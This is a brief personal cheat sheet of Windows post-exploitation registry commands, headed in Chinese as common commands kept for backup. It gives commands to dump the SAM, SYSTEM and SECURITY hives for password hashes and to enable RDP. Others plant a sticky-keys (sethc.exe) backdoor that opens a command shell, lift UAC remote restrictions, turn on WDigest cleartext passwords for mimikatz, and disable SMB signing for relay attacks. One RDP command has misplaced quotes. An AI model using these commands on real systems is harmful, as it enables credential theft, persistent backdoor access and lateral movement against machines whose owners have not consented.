Windows 常用命令
Contents
仅作为备份.
dump hive hash
dump system hash into .hive file.
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
open port 3389
one command.
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
sethc hijacking
shift backdoor.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
disabled uac policy
allow remote access for other administrator users.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
store clearpassword in lsass
mimikatz for server 2012.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
disable smb signature
smb relay attack.
reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v RequireSecuritySignature /t REG_DWORD /d 0 /f